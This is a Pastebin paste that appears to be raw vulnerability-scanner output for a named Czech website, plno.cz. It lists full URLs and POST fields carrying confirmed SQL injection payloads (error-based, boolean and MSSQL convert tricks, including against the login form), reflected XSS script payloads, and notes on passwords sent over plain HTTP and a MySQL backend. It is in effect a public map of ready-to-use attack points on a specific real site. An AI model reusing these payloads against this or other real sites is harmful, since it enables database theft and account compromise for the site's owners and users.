API tools faq
paste
Advertisement
sroub3k

plno.cz

sroub3k
Jul 20th, 2012
155
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.50 KB | None | 0 0
raw download clone embed print report
  1. SQL Injection
  2.  
  3. Severity: Critical
  4. Confirmation: Confirmed
  5. URL: http://www.plno.cz/NEWS/default.asp?o=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  6. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  7. Parameter Name: o
  8. Parameter Type: Querystring
  9. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  10.  
  11. Severity: Critical
  12. Confirmation: Confirmed
  13. URL: http://www.plno.cz/NEWS/default.asp?slovo=' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='&zkr=0
  14. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  15. Parameter Name: slovo
  16. Parameter Type: Querystring
  17. Attack Pattern: ' and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1) or '1'='
  18.  
  19. Severity: Critical
  20. Confirmation: Confirmed
  21. URL: http://www.plno.cz/NEWS/data/kliknuto.asp?cl=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  22. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  23. Parameter Name: cl
  24. Parameter Type: Querystring
  25. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  26.  
  27. ||| Boolean Based SQL Injection
  28.  
  29. Severity: Critical
  30. Confirmation: Confirmed
  31. URL: http://www.plno.cz/NEWS/default.asp?o=-1 OR 17-7=10
  32. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  33. Parameter Name: o
  34. Parameter Type: Querystring
  35. Attack Pattern: -1 OR 17-7=10
  36.  
  37. Severity: Critical
  38. Confirmation: Confirmed
  39. URL: http://www.plno.cz/NEWS/default.asp?slovo=' OR 'ns'='ns&zkr=0
  40. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  41. Parameter Name: slovo
  42. Parameter Type: Querystring
  43. Attack Pattern: ' OR 'ns'='ns
  44.  
  45. ||| [High Possibility] SQL Injection
  46.  
  47. Severity: Critical
  48. Confirmation: Confirmed
  49. URL: http://www.plno.cz/NEWS/default.asp?o=%27
  50. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  51. Parameter Name: o
  52. Parameter Type: Querystring
  53. Attack Pattern: %27
  54.  
  55. Severity: Critical
  56. Confirmation: Confirmed
  57. URL: http://www.plno.cz/NEWS/default.asp?slovo='+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'&zkr=0
  58. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  59. Parameter Name: slovo
  60. Parameter Type: Querystring
  61. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  62.  
  63. Severity: Critical
  64. Confirmation: Confirmed
  65. URL: http://www.plno.cz/NEWS/default.asp?o=%27&zkr=3829
  66. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  67. Parameter Name: o
  68. Parameter Type: Querystring
  69. Attack Pattern: %27
  70.  
  71. Severity: Critical
  72. Confirmation: Confirmed
  73. URL: http://www.plno.cz/NEWS/default.asp?o=NSFTW&zkr=3829
  74. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  75. Parameter Name: o
  76. Parameter Type: Querystring
  77. Attack Pattern: NSFTW
  78.  
  79. Severity: Critical
  80. Confirmation: Confirmed
  81. URL: http://www.plno.cz/NEWS/data/kliknuto.asp?cl=%27
  82. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  83. Parameter Name: cl
  84. Parameter Type: Querystring
  85. Attack Pattern: %27
  86.  
  87. Severity: Critical
  88. Confirmation: Confirmed
  89. URL : http://www.plno.cz/NEWS/data/VlozUzivatele.asp
  90. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  91. Parameter Name: fax1
  92. Parameter Type: Post
  93. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  94.  
  95. Severity: Critical
  96. Confirmation: Confirmed
  97. URL: http://www.plno.cz/NEWS/data/OvereniUzivatele.asp
  98. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  99. Parameter Name: login
  100. Parameter Type: Post
  101. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  102.  
  103. Severity: Critical
  104. Confirmation:Confirmed
  105. URL : http://www.plno.cz/NEWS/data/VlozUzivatele.asp
  106. Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
  107. Parameter Name: fax2
  108. Parameter Type: Post
  109. Attack Pattern: '+ (select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97)) FROM syscolumns) +'
  110.  
  111. ||| XSS (Cross-site Scripting)
  112.  
  113. Severity : Important
  114. Confirmation: Confirmed
  115. URL: http://www.plno.cz/NEWS/default.asp?o='"--></style></script><script>alert(0x000449)</script>
  116. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  117. Parameter Name: o
  118. Parameter Type: Querystring
  119. Attack Pattern: '"--></style></script><script>alert(0x000449)</script>
  120.  
  121. Severity : Important
  122. Confirmation: Confirmed
  123. URL: http://www.plno.cz/NEWS/default.asp?slovo='"--></style></script><script>alert(0x000460)</script>&zkr=0
  124. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  125. Parameter Name: slovo
  126. Parameter Type: Querystring
  127. Attack Pattern: '"--></style></script><script>alert(0x000460)</script>
  128.  
  129. Severity : Important
  130. Confirmation: Confirmed
  131. URL: http://www.plno.cz/NEWS/default.asp?o='"--></style></script><script>alert(0x000496)</script>&zkr=3829
  132. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  133. Parameter Name: o
  134. Parameter Type: Querystring
  135. Attack Pattern: '"--></style></script><script>alert(0x000496)</script>
  136.  
  137. Severity : Important
  138. Confirmation : Confirmed
  139. URL : http://www.plno.cz/NEWS/registrace.asp?email='"--></style></script><script>netsparker(0x0004FA)</script>&fax1=3&fax2=3&hsl1=3&hsl2=3&info=N&jmeno=3&K=3&kod=3&login=3&obec=3&pozn1=3&prijmeni=3&psc=3&report=N&tel1=3&tel2=3&ulice=3&UzN=3&zeme=1&e=1
  140. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  141. Parameter Name: email
  142. Parameter Type: Post
  143. Attack Pattern: '"--></style></script><script>alert(0x0004FA)</script>
  144.  
  145. Severity: Important
  146. Confirmation: Confirmed
  147. URL: http://www.plno.cz/NEWS/registrace.asp?email=netsparker@example.com&fax1=3&fax2=3&hsl1='"--></style></script><script>netsparker(0x0005AD)</script>&hsl2=3&info=N&jmeno=3&K=3&kod=3&login=3&obec=3&pozn1=3&prijmeni=3&psc=3&report=N&tel1=3&tel2=3&ulice=3&UzN=3&zeme=1&h=1
  148. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  149. Parameter Name: hsl1
  150. Parameter Type: Post
  151. Attack Pattern: '"--></style></script><script>alert(0x0005AD)</script>
  152.  
  153. ||| Password Transmitted Over HTTP
  154.  
  155. Severity: Important
  156. Confirmation: Confirmed
  157. URL: http://www.plno.cz/NEWS/registrace.asp
  158. Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
  159. Form target action: data/VlozUzivatele.asp
  160.  
  161. ||| Robots.txt Identified
  162.  
  163. Severity: Information
  164. Confirmation: Confirmed
  165. URL: http://www.plno.cz/robots.txt
  166. Interesting Robots.txt
  167. Entries:
  168. Disallow: /DATA/
  169. Disallow: /NEWS/
  170. Disallow: /NEWS/DATA/
  171.  
  172. ||| MySQL Database Identified
  173.  
  174. Severity: Information
  175. Confirmation: Confirmed
  176. URL: http://www.plno.cz/NEWS/default.asp?o=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
  177. Parameter Name: o
  178. Parameter Type: Querystring
  179. Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!